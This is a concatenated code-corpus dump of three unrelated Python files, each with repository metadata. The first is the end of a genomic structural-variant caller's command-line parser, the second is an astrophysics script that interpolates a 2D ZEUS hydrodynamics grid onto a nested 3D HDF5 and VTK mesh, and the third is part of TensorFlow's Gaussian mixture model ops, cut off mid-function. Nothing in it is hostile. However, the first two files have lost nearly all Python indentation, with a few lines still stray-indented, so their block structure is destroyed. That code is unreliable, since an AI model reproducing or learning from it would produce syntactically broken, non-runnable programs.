parser_runner.add_argument("--sample", help="Sample name to use in final variant calls", default="UnnamedSample")
parser_runner.add_argument("--species", help="Common or scientific species name to pass to RepeatMasker", default="human")
parser_runner.add_argument("--runjobs", help="A comma-separated list of jobs for each step: align, detect, assemble, and call (in that order). A missing number uses the value set by --jobs (or 1 if --jobs was not set).", default="")
parser_runner.add_argument("--alignment_parameters", help="BLASR parameters to use to align raw reads", default="-bestn 2 -maxAnchorsPerPosition 100 -advanceExactMatches 10 -affineAlign -affineOpen 100 -affineExtend 0 -insertion 5 -deletion 5 -extend -maxExtendDropoff 50")
parser_runner.add_argument("--mapping_quality", type=int, help="minimum mapping quality of raw reads to use for local assembly", default=30)
parser_runner.add_argument("--minutes_to_delay_jobs", type=int, help="maximum number of minutes to delay local assembly jobs to limit simultaneous I/O on shared storage", default=1)
parser_runner.add_argument("--assembly_log", help="name of log file for local assemblies", default="assembly.log")
parser_runner.add_argument("--min_hardstop_support", type=int, help="minimum number of reads with hardstops required to flag a region as an SV candidate", default=11)
parser_runner.add_argument("--max_candidate_length", type=int, help="maximum length allowed for an SV candidate region", default=60000)
parser_runner.set_defaults(func=run)
# Genotype SVs with Illumina reads.
parser_genotyper = subparsers.add_parser("genotype", help="Genotype SVs with Illumina reads")
parser_genotyper.add_argument("genotyper_config", help="JSON configuration file with SV reference paths, samples to genotype as BAMs, and their corresponding references")
parser_genotyper.add_argument("genotyped_variants", help="VCF of SMRT SV variant genotypes for the given sample-level BAMs")
parser_genotyper.add_argument("--threads", help="number of threads to use for each BWA MEM alignment job", type=int, default=1)
parser_genotyper.set_defaults(func=genotype)
args = parser.parse_args()
# Set DRMAA library path
if args.drmaalib is not None:
PROCESS_ENV["DRMAA_LIBRARY_PATH"] = args.drmaalib
elif args.distribute and "DRMAA_LIBRARY_PATH" not in PROCESS_ENV:
sys.stderr.write("WARNING: --distribute is set, but DRMAA_LIBRARY_PATH is not set in the environment or via the --drmaalib option: Searching only in Python's library path for libdrmaa.so\n")
# Report paths if verbose
if args.verbose:
# Print python version
        print('Python version: {0}'.format(re.sub(r'\s*\n\s*', ' - ', sys.version)))
# Print environment
print("PATH:")
for PATH_ELEMENT in PROCESS_ENV["PATH"].split(":"):
print("\t* %s" % PATH_ELEMENT)
print("LD_LIBRARY_PATH:")
for PATH_ELEMENT in PROCESS_ENV["LD_LIBRARY_PATH"].split(":"):
print("\t* %s" % PATH_ELEMENT)
if "DRMAA_LIBRARY_PATH" in PROCESS_ENV:
print("DRMAA_LIBRARY_PATH: %s" % PROCESS_ENV["DRMAA_LIBRARY_PATH"])
else:
print("DRMAA_LIBRARY_PATH: <NOT_SET>\n\t* Not required unless --distribute is set")
# Print arguments
print("Arguments:")
for key in sorted(vars(args).keys()):
print('\t* %s = %s' % (key, getattr(args, key)))
# Flush output
sys.stdout.flush()
# Make a log directory for grid-engine-style error logs if commands are
# being distributed in non-dryrun mode.
if args.distribute and not args.dryrun and not os.path.isdir("log"):
os.mkdir("log")
# Run target command
return_code = args.func(args)
sys.exit(return_code)
|
EichlerLab/pacbio_variant_caller
|
bin/smrtsv.py
|
Python
|
mit
| 26,810
|
[
"BWA"
] |
e10ecbf8b40e7ac98c6dfa38270b73ad3859edbab3a4ff0c3253835eab9696ec
|
#!/usr/bin/env python
mi=16;mj=mi;mk=mi # Dimension of the coarsest grid
Lx=3e17;Ly=Lx;Lz=Lx # Length of the Domain
Critical_value=-119 # Density Criterion
Max_level=4 # Max hierachical level
import numpy as np
import array
from math import *
from tables import *
from tables.nodes import filenode
writegrid=1
# Physical parameter
T_k=10.
X_mol=1e-9
V_t=200.
nref=[2,2,2]
T_cmb=2.73
gas_to_dust=0.0
molec=""
geom='rec3d'
root="/"
# unit conversion
m_cm=1e-2
Nn_gcm=1e6*6.022e23/2.
pc_cm=1/3.08568025e18
# dimension of input data
ni=406
nj=186
# Create Cartesian Grid
dx=Lx/float(mi);dy=Ly/float(mj);dz=Lz/float(mk)
x=[];y=[];z=[]
for i in range(mi+1):
x.append(-0.5*Lx+float(i)*dx)
for j in range(mj+1):
y.append(-0.5*Ly+float(j)*dy)
for k in range(mk+1):
z.append(-0.5*Lz+float(k)*dz)
x2 = array.array('d')
y2 = array.array('d')
z2 = array.array('d')
datadir='/home/vandine/work/GridConversion/'
# Load radius
tmpfile=datadir+'z_x1ap'
f=open( tmpfile,'rb')
ra = array.array('d')
ra.read(f,ni)
tmpfile=datadir+'z_x1bp'
f=open( tmpfile,'rb')
rb = array.array('d')
rb.read(f,ni)
# Load theta
tmpfile=datadir+'z_x2ap'
f=open( tmpfile,'rb')
thetaa = array.array('d')
thetaa.read(f,nj)
tmpfile=datadir+'z_x2bp'
f=open( tmpfile,'rb')
thetab = array.array('d')
thetab.read(f,nj)
# Load density
tmpfile=datadir+'o_d__00100'
f=open( tmpfile,'rb')
density = array.array('d')
density.read(f,ni*nj)
density=np.reshape(density,(nj,ni))
# Load velocity
tmpfile=datadir+'o_v1_00100'
f=open( tmpfile,'rb')
Vr = array.array('d')
Vr.read(f,ni*nj)
Vr=np.reshape(Vr,(nj,ni))
tmpfile=datadir+'o_v2_00100'
f=open( tmpfile,'rb')
Vt = array.array('d')
Vt.read(f,ni*nj)
Vt=np.reshape(Vt,(nj,ni))
tmpfile=datadir+'o_v3_00100'
f=open( tmpfile,'rb')
Vp = array.array('d')
Vp.read(f,ni*nj)
Vp=np.reshape(Vp,(nj,ni))
f.close()
# geometry
R_in=ra[3]
R_out=ra[ni-3]
# convert R-theta to X-Z
Xb=np.zeros((nj,ni),np.float64)
Zb=np.zeros((nj,ni),np.float64)
for j in range(3,nj-2):
for i in range(3,ni-3):
Xb[j,i]=rb[i]*sin(thetab[j])
Zb[j,i]=rb[i]*cos(thetab[j])
# compute density gradient
grad_den=np.zeros((nj,ni),np.float64)
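# Magnitude of the density gradient in the (r, theta) plane by centered
# differences on the cell-centered (b) mesh:
#   d(rho)/dr ~ (rho[j,i+1]-rho[j,i-1]) / (r[i+1]-r[i-1])
#   (1/r) d(rho)/d(theta) ~ (rho[j+1,i]-rho[j-1,i]) / (r[i]*(theta[j+1]-theta[j-1]))
# This magnitude drives the mesh refinement criterion further below.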
for j in xrange(3,nj-2):
for i in xrange(3,ni-3):
den_r=(density[j,i+1]-density[j,i-1])/(rb[i+1]-rb[i-1])
den_theta=(density[j+1,i]-density[j-1,i])/(rb[i]*(thetab[j+1]-thetab[j-1]))
grad_den[j,i]=sqrt(den_r*den_r+den_theta*den_theta)
#print grad_den[j,i]
# write original 2D VTK file
if (writegrid):
fmb=open('2D.vtk', mode = "w")
print >>fmb,'# vtk DataFile Version 3.0'
print >>fmb,'2DHydro'
print >>fmb,'ASCII'
print >>fmb,'DATASET STRUCTURED_GRID'
print >>fmb,'DIMENSIONS %(0)5d %(1)5d %(2)5d'%{'0':nj-5,'1':ni-5,'2':1}
print >>fmb,'POINTS %(0)8d float'%{'0':(ni-5)*(nj-5)}
for i in range(3,ni-2):
for j in range(3,nj-2):
print >>fmb,'%(0)11.4e %(1)1d %(2)11.4e'%{'0':ra[i]*sin(thetaa[j])*pc_cm,'1':0,'2':ra[i]*cos(thetaa[j])*pc_cm}
print >>fmb,'CELL_DATA %(0)8d'%{'0':(ni-6)*(nj-6)}
print >>fmb,'SCALARS density float 1'
print >>fmb,'LOOKUP_TABLE default'
for i in range(3,ni-3):
for j in range(3,nj-3):
print >>fmb,'%(0)11.4e'%{'0':density[j,i]}
fmb.close()
# Define a user record to characterize some kind of particles
class Particle(IsDescription):
LEVEL=Int32Col(pos=0)
POS=Int64Col(pos=1)
geom=StringCol(itemsize=6,pos=2)
X_max=Float64Col(shape=3,pos=3)
X_min=Float64Col(shape=3,pos=4)
X_cen=Float64Col(shape=3,pos=5)
n_H2=Float64Col(pos=6)
T_k=Float64Col(pos=7)
X_mol=Float64Col(pos=8)
X_pH2=Float64Col(pos=9)
X_oH2=Float64Col(pos=10)
X_e=Float64Col(pos=11)
X_H=Float64Col(pos=12)
X_He=Float64Col(pos=13)
V_t=Float64Col(pos=14)
V_edge=FloatCol(shape=(6,3),pos=15)
V_cen=FloatCol(shape=3,pos=16)
ds=FloatCol(pos=17)
NCHILDREN=Int64Col(pos=18)
NAXES=Int64Col(shape=3,pos=19)
T_d=Float64Col(pos=20)
kapp_d=StringCol(itemsize=64,pos=21)
T_ff=Float64Col(pos=22)
kapp_ff=StringCol(itemsize=64,pos=23)
T_bb=Float64Col(pos=24)
def main(pfile,direc,xaxis,yaxis,zaxis,n1,n2,level,position,pf2,npart,nzone):
# Create ZONE table
table = pfile.createTable(direc, 'ZONE', Particle, "Grid table")
particle = table.row
particle['LEVEL'] = level-1
particle['POS'] = position
particle['geom'] = geom
particle['X_max'] =[ xaxis[n1[0]]*pc_cm,yaxis[n1[1]]*pc_cm,zaxis[n1[2]]*pc_cm ]
particle['X_min'] =[ xaxis[0]*pc_cm,yaxis[0]*pc_cm,zaxis[0]*pc_cm ]
particle['X_cen'] =[ 0.5*(particle['X_max'][0]+particle['X_min'][0]),0.5*(particle['X_max'][1]+particle['X_min'][1]),0.5*(particle['X_max'][2]+particle['X_min'][2])]
particle['NCHILDREN'] =n1[0]*n1[1]*n1[2]
particle['NAXES'] =n1
#Insert a new particle record
particle.append()
table.flush()
    # Drop the PyTables bookkeeping attributes (FIELD_*_FILL and NROWS).
    for field in range(25):
        delattr(table.attrs, 'FIELD_%d_FILL' % field)
    del table.attrs.NROWS
cen_x=np.zeros(n1[0],np.float64)
cen_y=np.zeros(n1[1],np.float64)
cen_z=np.zeros(n1[2],np.float64)
rho=np.zeros(n1,np.float64)
Vx=np.zeros(n1,np.float64)
Vy=np.zeros(n1,np.float64)
Vz=np.zeros(n1,np.float64)
for i in range(n1[0]):
cen_x[i]=0.5*(xaxis[i]+xaxis[i+1])
for j in range(n1[1]):
cen_y[j]=0.5*(yaxis[j]+yaxis[j+1])
for k in range(n1[2]):
cen_z[k]=0.5*(zaxis[k]+zaxis[k+1])
# Create GRID table
table = pfile.createTable(direc, 'GRID', Particle, "Grid table")
particle = table.row
for i in range(n1[0]):
for j in range(n1[1]):
for k in range(n1[2]):
# write a row of grid table
particle['LEVEL'] = level
particle['POS'] = n1[1]*n1[2]*i+n1[2]*j+k
particle['geom'] = geom
particle['X_max'] =[ xaxis[i+1]*pc_cm,yaxis[j+1]*pc_cm,zaxis[k+1]*pc_cm]
particle['X_min'] =[ xaxis[i]*pc_cm,yaxis[j]*pc_cm,zaxis[k]*pc_cm]
particle['X_cen'] =[ cen_x[i]*pc_cm,cen_y[j]*pc_cm,cen_z[k]*pc_cm]
# project the cuboid zone to the R-theta plane
abs_minx=min(abs(xaxis[i]),abs(xaxis[i+1]))
abs_maxx=max(abs(xaxis[i]),abs(xaxis[i+1]))
abs_miny=min(abs(yaxis[j]),abs(yaxis[j+1]))
abs_maxy=max(abs(yaxis[j]),abs(yaxis[j+1]))
minX=sqrt( abs_minx*abs_minx+abs_miny*abs_miny)
maxX=sqrt( abs_maxx*abs_maxx+abs_maxy*abs_maxy)
minZ=zaxis[k]
maxZ=zaxis[k+1]
abs_minz=min(abs(minZ),abs(maxZ))
abs_maxz=max(abs(minZ),abs(maxZ))
minR=sqrt( minX*minX+abs_minz*abs_minz)
maxR=sqrt( maxX*maxX+abs_maxz*abs_maxz)
if (maxZ>0.0):
minTheta=atan(minX/maxZ)
elif (maxZ<0.0):
minTheta=atan(maxX/maxZ)+pi
else:
minTheta=0.5*pi
if (minZ>0.0):
maxTheta=atan(maxX/minZ)
elif (minZ<0.0):
maxTheta=atan(minX/minZ)+pi
else:
maxTheta=0.5*pi
# narrow down the searching domain
for tempi in xrange(3,ni-3):
if (rb[tempi]>minR):
break
i1=tempi
for tempi in xrange(i1,ni-3):
if (rb[tempi]>maxR):
break
i2=tempi
for tempj in xrange(3,nj-2):
if (thetab[tempj]>minTheta):
break
j1=tempj
for tempj in xrange(j1,nj-2):
if (thetab[tempj]>maxTheta):
break
j2=tempj
# search for maximum density gradient
max_grad=1E-100
for tempj in range(j1,j2):
for tempi in range(i1,i2):
if ( (minX<=Xb[tempj,tempi]<maxX) and (minZ<=Zb[tempj,tempi]<maxZ) ):
if ( max_grad<grad_den[tempj,tempi] ):
max_grad=grad_den[tempj,tempi]
# divide higher level
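                # Refine when the local gradient is steep relative to this
                # level (log2(max_grad) - level > Critical_value) or when the
                # zone straddles the outer radial boundary, up to Max_level.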
if ( ((log(max_grad)/log(2)-level)>Critical_value or minR<R_out<maxR) and level<Max_level ):
particle['NCHILDREN'] =n2[0]*n2[1]*n2[2]
particle['NAXES'] =n2
gdir='grid'+'%(0)d'%{'0':n1[1]*n1[2]*i+n1[2]*j+k}
group = pfile.createGroup(direc,gdir,gdir)
if (direc=="/"):
path=direc+gdir
else:
path=direc+"/"+gdir
h5file.delNodeAttr(path, "TITLE", name=None)
h5file.delNodeAttr(path, "CLASS", name=None)
h5file.delNodeAttr(path, "VERSION", name=None)
h5file.setNodeAttr(path, "molec", molec, name=None)
h5file.setNodeAttr(path, "T_cmb", T_cmb, name=None)
h5file.setNodeAttr(path, "gas_to_dust", gas_to_dust, name=None)
h5file.setNodeAttr(path, "velfield", "grid ", name=None)
dx2=(xaxis[i+1]-xaxis[i])/float(n2[0])
dy2=(yaxis[j+1]-yaxis[j])/float(n2[1])
dz2=(zaxis[k+1]-zaxis[k])/float(n2[2])
x2=np.zeros(n2[0]+1,np.float64)
y2=np.zeros(n2[1]+1,np.float64)
z2=np.zeros(n2[2]+1,np.float64)
for tempi in range(n2[0]+1):
x2[tempi]=xaxis[i]+float(tempi)*dx2
for tempj in range(n2[1]+1):
y2[tempj]=yaxis[j]+float(tempj)*dy2
for tempk in range(n2[2]+1):
z2[tempk]=zaxis[k]+float(tempk)*dz2
                    # Recursively create the nested grid.
(npart,nzone)=main(pfile,path,x2,y2,z2,n2,nref,level+1,particle['POS'],pf2,npart,nzone)
# the leaf zone
else:
tempR=sqrt(cen_x[i]*cen_x[i]+cen_y[j]*cen_y[j]+cen_z[k]*cen_z[k])
if (tempR<=R_out): # inside the boundary/ non-empty
if (cen_z[k]==0.):
tempTheta=0.5*pi
else:
tempTheta=atan( sqrt(cen_x[i]*cen_x[i]+cen_y[j]*cen_y[j]) / cen_z[k] )
if (tempTheta<0):
tempTheta=tempTheta+pi
if (cen_x[i]==0.):
if(cen_y[j]>0):
tempPhi=0.5*pi
else:
tempPhi=-0.5*pi
else:
tempPhi=atan(cen_y[j]/cen_x[i])
                            if (cen_x[i]<0):
tempPhi=tempPhi+pi
elif (tempPhi<0):
tempPhi=tempPhi+2*pi
if (tempR<R_in):
print 'Mesh inside the boundary!'
elif (tempR>R_out):
print 'Mesh outside the boundary!'
# interpolation
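                        # Bilinear interpolation in (R, theta). Density and
                        # Vphi live on the cell-centered b-mesh; Vr is staggered
                        # on the radial a-mesh and Vtheta on the angular a-mesh,
                        # hence the separate index searches below.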
for tempai in xrange(3,ni-2):
if (ra[tempai]>tempR):
break
for tempaj in xrange(3,nj-2):
if (thetaa[tempaj]>tempTheta):
break
for tempbi in xrange(3,ni-3):
if (rb[tempbi]>tempR):
break
for tempbj in xrange(3,nj-2):
if (thetab[tempbj]>tempTheta):
break
alpha=(tempR-rb[tempbi-1])/(rb[tempbi]-rb[tempbi-1])
beta=(tempTheta-thetab[tempbj-1])/(thetab[tempbj]-thetab[tempbj-1])
rho[i,j,k]=(1.-alpha)*(1.-beta)*density[tempbj-1,tempbi-1]+alpha*(1.-beta)*density[tempbj-1,tempbi]+\
beta*(1.-alpha)*density[tempbj,tempbi-1]+alpha*beta*density[tempbj,tempbi]
tempVp=(1.-alpha)*(1.-beta)*Vp[tempbj-1,tempbi-1]+alpha*(1.-beta)*Vp[tempbj-1,tempbi]+\
beta*(1.-alpha)*Vp[tempbj,tempbi-1]+alpha*beta*Vp[tempbj,tempbi]
alpha=(tempR-ra[tempai-1])/(ra[tempai]-ra[tempai-1])
tempVr=(1.-alpha)*(1.-beta)*Vr[tempbj-1,tempai-1]+alpha*(1.-beta)*Vr[tempbj-1,tempai]+\
beta*(1.-alpha)*Vr[tempbj,tempai-1]+alpha*beta*Vr[tempbj,tempai]
alpha=(tempR-rb[tempbi-1])/(rb[tempbi]-rb[tempbi-1])
beta=(tempTheta-thetab[tempaj-1])/(thetab[tempaj]-thetab[tempaj-1])
tempVt=(1.-alpha)*(1.-beta)*Vt[tempaj-1,tempbi-1]+alpha*(1.-beta)*Vt[tempaj-1,tempbi]+\
beta*(1.-alpha)*Vt[tempaj,tempbi-1]+alpha*beta*Vt[tempaj,tempbi]
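                        # Rotate (Vr, Vtheta, Vphi) into Cartesian components:
                        #   Vx = st*cp*Vr + ct*cp*Vt - sp*Vp
                        #   Vy = st*sp*Vr + ct*sp*Vt + cp*Vp
                        #   Vz = ct*Vr    - st*Vt
                        # with st=sin(theta), ct=cos(theta), sp=sin(phi), cp=cos(phi).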
Vx[i,j,k]=sin(tempTheta)*cos(tempPhi)*tempVr+cos(tempTheta)*cos(tempPhi)*tempVt-sin(tempPhi)*tempVp
Vy[i,j,k]=sin(tempTheta)*sin(tempPhi)*tempVr+cos(tempTheta)*sin(tempPhi)*tempVt+cos(tempPhi)*tempVp
Vz[i,j,k]=cos(tempTheta)*tempVr-sin(tempTheta)*tempVt
# write out the non-empty-leaf zone
particle['n_H2'] =rho[i,j,k]*Nn_gcm
particle['V_cen'] =[Vx[i,j,k]*m_cm,Vy[i,j,k]*m_cm,Vz[i,j,k]*m_cm]
particle['T_k'] =T_k
particle['X_mol'] =X_mol
particle['V_t'] =V_t
nzone=nzone+1
# Insert a new particle record
particle.append()
if (level==0):
print n1[1]*n1[2]*i+n1[2]*j+k,'/',n1[0]*n1[1]*n1[2]
table.flush()
    # Drop the PyTables bookkeeping attributes (FIELD_*_FILL and NROWS).
    for field in range(25):
        delattr(table.attrs, 'FIELD_%d_FILL' % field)
    del table.attrs.NROWS
# Write Grid for visualization
if (writegrid):
fname='multiblock/post_'+str(npart)+'.vtr'
f=open(fname,'w')
# write in VTR format
print >>f,'<?xml version="1.0"?>'
print >>f,'<VTKFile type="RectilinearGrid" version="0.1" byte_order="LittleEndian">'
print >>f,' <RectilinearGrid WholeExtent="%(0)d %(1)d %(2)d %(3)d %(4)d %(5)d">'\
%{'0':0,'1':n1[0],'2':0,'3':n1[1],'4':0,'5':n1[2]}
print >>f,' <Piece Extent="%(0)d %(1)d %(2)d %(3)d %(4)d %(5)d">'\
%{'0':0,'1':n1[0],'2':0,'3':n1[1],'4':0,'5':n1[2]}
print >>f,' <Coordinates> '
print >>f,' <DataArray type="Float32" Name="X_COORDINATES" NumberOfComponents="1">'
for i in range(n1[0]+1):
print >>f,'%(0)12.6e'%{'0':xaxis[i]*pc_cm},
print >>f,'\n </DataArray>'
print >>f,' <DataArray type="Float32" Name="Y_COORDINATES" NumberOfComponents="1">'
for j in range(n1[1]+1):
print >>f,'%(0)12.6e'%{'0':yaxis[j]*pc_cm},
print >>f,'\n </DataArray>'
print >>f,' <DataArray type="Float32" Name="Z_COORDINATES" NumberOfComponents="1">'
for k in range(n1[2]+1):
print >>f,'%(0)12.6e'%{'0':zaxis[k]*pc_cm},
print >>f,'\n </DataArray>'
print >>f,' </Coordinates>'
print >>f,' </Piece>'
print >>f,' </RectilinearGrid>'
print >>f,'</VTKFile>'
f.close()
print >>fmb,' <DataSet group="%(0)d" dataset="0" file="%(1)s"/>'%{'0':npart,'1':fname}
return npart+1,nzone
# Timer
import time
tStart = time.time()
# Open a file in "w"rite mode
if (writegrid):
fmb=open('multiblock.pvd', mode = "w")
print >>fmb,'<?xml version="1.0"?>'
print >>fmb,'<VTKFile type="Collection" version="0.1" byte_order="LittleEndian" compressor="vtkZLibDataCompressor">'
print >>fmb,' <Collection>'
filename = "model"
h5file = openFile(filename, mode = "w", title = "Test file")
h5file.delNodeAttr("/", "TITLE", name=None)
h5file.delNodeAttr("/", "CLASS", name=None)
h5file.delNodeAttr("/", "VERSION", name=None)
h5file.delNodeAttr("/", "PYTABLES_FORMAT_VERSION", name=None)
h5file.setNodeAttr("/", "molec", molec, name=None)
h5file.setNodeAttr("/", "T_cmb", T_cmb, name=None)
h5file.setNodeAttr("/", "gas_to_dust", gas_to_dust, name=None)
h5file.setNodeAttr("/", "velfield", "grid ", name=None)
naxe=[mi,mj,mk]
zone=0
(part,zone)=main(h5file,root,x,y,z,naxe,nref,0,0,fmb,0,zone)
# Close (and flush) the file
h5file.close()
if (writegrid):
print >>fmb,' </Collection>'
print >>fmb,'</VTKFile>'
fmb.close()
tEnd = time.time()
# print out meta information
total_time=tEnd-tStart
hh=int(total_time/60/60)
mm=int(total_time/60%60)
ss=int(total_time%60)
print 'Elapsing time = %(0)d h %(1)d m %(2)d s'%{'0':hh,'1':mm,'2':ss}
print 'max radius=',Lx*0.5*sqrt(3)
print 'original radius=',R_out
print zone,'zones'
|
itahsieh/sparx-alpha
|
preprocessor/script/nested3D_ZEUS.py
|
Python
|
gpl-3.0
| 21,387
|
[
"VTK"
] |
bfbff6ded0f0df0c6e20e61d6de0e056ee7719dd46662822f4c25ec3376cc8ac
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gaussian mixture models Operations."""
# TODO(xavigonzalvo): Factor out covariance matrix operations to make
# code reusable for different types (e.g. diag).
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.embedding_ops import embedding_lookup
from tensorflow.python.summary import summary
# Machine epsilon.
MEPS = np.finfo(float).eps
FULL_COVARIANCE = 'full'
DIAG_COVARIANCE = 'diag'
def _covariance(x, diag):
"""Defines the covariance operation of a matrix.
Args:
x: a matrix Tensor. Dimension 0 should contain the number of examples.
diag: if True, it computes the diagonal covariance.
Returns:
A Tensor representing the covariance of x. In the case of
diagonal matrix just the diagonal is returned.
"""
num_points = math_ops.to_float(array_ops.shape(x)[0])
x -= math_ops.reduce_mean(x, 0, keep_dims=True)
if diag:
cov = math_ops.reduce_sum(
math_ops.square(x), 0, keep_dims=True) / (num_points - 1)
else:
cov = math_ops.matmul(x, x, transpose_a=True) / (num_points - 1)
return cov
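# Added illustration (not part of the original module): a NumPy reference
# implementation of _covariance, handy for checking the TF op. The helper
# name `_np_covariance` is hypothetical.
def _np_covariance(x, diag):
  """NumPy analogue of _covariance for a 2-D array x (rows are examples)."""
  x = x - x.mean(axis=0, keepdims=True)
  n = x.shape[0]
  if diag:
    return np.square(x).sum(axis=0, keepdims=True) / (n - 1)
  return x.T.dot(x) / (n - 1)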
def _init_clusters_random(data, num_clusters, random_seed):
"""Does random initialization of clusters.
Args:
data: a list of Tensors with a matrix of data, each row is an example.
num_clusters: an integer with the number of clusters.
random_seed: Seed for PRNG used to initialize seeds.
Returns:
A Tensor with num_clusters random rows of data.
"""
assert isinstance(data, list)
num_data = math_ops.add_n([array_ops.shape(inp)[0] for inp in data])
with ops.control_dependencies(
[check_ops.assert_less_equal(num_clusters, num_data)]):
indices = random_ops.random_uniform(
[num_clusters],
minval=0,
maxval=math_ops.cast(num_data, dtypes.int64),
seed=random_seed,
dtype=dtypes.int64)
indices %= math_ops.cast(num_data, dtypes.int64)
clusters_init = embedding_lookup(data, indices, partition_strategy='div')
return clusters_init
class GmmAlgorithm(object):
"""Tensorflow Gaussian mixture model clustering class."""
CLUSTERS_WEIGHT = 'alphas'
CLUSTERS_VARIABLE = 'clusters'
CLUSTERS_COVS_VARIABLE = 'clusters_covs'
def __init__(self,
data,
num_classes,
initial_means=None,
params='wmc',
covariance_type=FULL_COVARIANCE,
random_seed=0):
"""Constructor.
Args:
data: a list of Tensors with data, each row is a new example.
num_classes: number of clusters.
initial_means: a Tensor with a matrix of means. If None, means are
computed by sampling randomly.
params: Controls which parameters are updated in the training
process. Can contain any combination of "w" for weights, "m" for
means, and "c" for covariances.
covariance_type: one of "full", "diag".
random_seed: Seed for PRNG used to initialize seeds.
Raises:
Exception if covariance type is unknown.
"""
self._params = params
self._random_seed = random_seed
self._covariance_type = covariance_type
if self._covariance_type not in [DIAG_COVARIANCE, FULL_COVARIANCE]:
raise Exception( # pylint: disable=g-doc-exception
'programmer error: Invalid covariance type: %s' %
self._covariance_type)
# Create sharded variables for multiple shards. The following
# lists are indexed by shard.
# Probability per example in a class.
num_shards = len(data)
self._probs = [None] * num_shards
# Prior probability.
self._prior_probs = [None] * num_shards
# Membership weights w_{ik} where "i" is the i-th example and "k"
# is the k-th mixture.
self._w = [None] * num_shards
# Number of examples in a class.
self._points_in_k = [None] * num_shards
first_shard = data[0]
self._dimensions = array_ops.shape(first_shard)[1]
self._num_classes = num_classes
# Small value to guarantee that covariances are invertible.
self._min_var = array_ops.diag(
array_ops.ones(array_ops.stack([self._dimensions]))) * 1e-3
self._create_variables()
self._initialize_variables(data, initial_means)
# Operations of partial statistics for the computation of the means.
self._w_mul_x = []
# Operations of partial statistics for the computation of the covariances.
self._w_mul_x2 = []
self._define_graph(data)
def _create_variables(self):
"""Initializes GMM algorithm."""
init_value = array_ops.constant([], dtype=dtypes.float32)
self._means = variables.Variable(init_value,
name=self.CLUSTERS_VARIABLE,
validate_shape=False)
self._covs = variables.Variable(
init_value, name=self.CLUSTERS_COVS_VARIABLE, validate_shape=False)
# Mixture weights, representing the probability that a randomly
# selected unobservable data (in EM terms) was generated by component k.
self._alpha = variable_scope.variable(
array_ops.tile([1.0 / self._num_classes], [self._num_classes]),
name=self.CLUSTERS_WEIGHT,
validate_shape=False)
self._cluster_centers_initialized = variables.Variable(False,
dtype=dtypes.bool,
name='initialized')
def _initialize_variables(self, data, initial_means=None):
"""Initializes variables.
Args:
data: a list of Tensors with data, each row is a new example.
initial_means: a Tensor with a matrix of means.
"""
first_shard = data[0]
# Initialize means: num_classes X 1 X dimensions.
if initial_means is not None:
means = array_ops.expand_dims(initial_means, 1)
else:
# Sample data randomly
means = array_ops.expand_dims(
_init_clusters_random(data, self._num_classes, self._random_seed), 1)
# Initialize covariances.
if self._covariance_type == FULL_COVARIANCE:
cov = _covariance(first_shard, False) + self._min_var
# A matrix per class, num_classes X dimensions X dimensions
covs = array_ops.tile(
array_ops.expand_dims(cov, 0), [self._num_classes, 1, 1])
elif self._covariance_type == DIAG_COVARIANCE:
cov = _covariance(first_shard, True) + self._min_var
# A diagonal per row, num_classes X dimensions.
covs = array_ops.tile(
array_ops.expand_dims(array_ops.diag_part(cov), 0),
[self._num_classes, 1])
with ops.colocate_with(self._cluster_centers_initialized):
initialized = control_flow_ops.with_dependencies(
[means, covs],
array_ops.identity(self._cluster_centers_initialized))
self._init_ops = []
with ops.colocate_with(self._means):
init_means = state_ops.assign(self._means, means, validate_shape=False)
init_means = control_flow_ops.with_dependencies(
[init_means],
state_ops.assign(self._cluster_centers_initialized, True))
self._init_ops.append(control_flow_ops.cond(initialized,
control_flow_ops.no_op,
lambda: init_means).op)
with ops.colocate_with(self._covs):
init_covs = state_ops.assign(self._covs, covs, validate_shape=False)
init_covs = control_flow_ops.with_dependencies(
[init_covs],
state_ops.assign(self._cluster_centers_initialized, True))
self._init_ops.append(control_flow_ops.cond(initialized,
control_flow_ops.no_op,
lambda: init_covs).op)
def init_ops(self):
"""Returns the initialization operation."""
return control_flow_ops.group(*self._init_ops)
def training_ops(self):
"""Returns the training operation."""
return control_flow_ops.group(*self._train_ops)
def is_initialized(self):
"""Returns a boolean operation for initialized variables."""
return self._cluster_centers_initialized
def alphas(self):
return self._alpha
def clusters(self):
"""Returns the clusters with dimensions num_classes X 1 X num_dimensions."""
return self._means
def covariances(self):
"""Returns the covariances matrices."""
return self._covs
def assignments(self):
"""Returns a list of Tensors with the matrix of assignments per shard."""
ret = []
for w in self._w:
ret.append(math_ops.argmax(w, 1))
return ret
def scores(self):
"""Returns the distances to each class.
Returns:
A tuple with two Tensors. The first contains the distance to
each class. The second contains the distance to the assigned
class.
"""
return (self._all_scores, self._scores)
def _define_graph(self, data):
"""Define graph for a single iteration.
Args:
data: a list of Tensors defining the training data.
"""
for shard_id, shard in enumerate(data):
self._num_examples = array_ops.shape(shard)[0]
shard = array_ops.expand_dims(shard, 0)
self._define_log_prob_operation(shard_id, shard)
self._define_prior_log_prob_operation(shard_id)
self._define_expectation_operation(shard_id)
self._define_partial_maximization_operation(shard_id, shard)
self._define_maximization_operation(len(data))
self._define_distance_to_clusters(data)
def _define_full_covariance_probs(self, shard_id, shard):
"""Defines the full covariance probabilties per example in a class.
Updates a matrix with dimension num_examples X num_classes.
Args:
shard_id: id of the current shard.
shard: current data shard, 1 X num_examples X dimensions.
"""
diff = shard - self._means
cholesky = linalg_ops.cholesky(self._covs + self._min_var)
log_det_covs = 2.0 * math_ops.reduce_sum(
math_ops.log(array_ops.matrix_diag_part(cholesky)), 1)
x_mu_cov = math_ops.square(
linalg_ops.matrix_triangular_solve(
cholesky, array_ops.transpose(
diff, perm=[0, 2, 1]), lower=True))
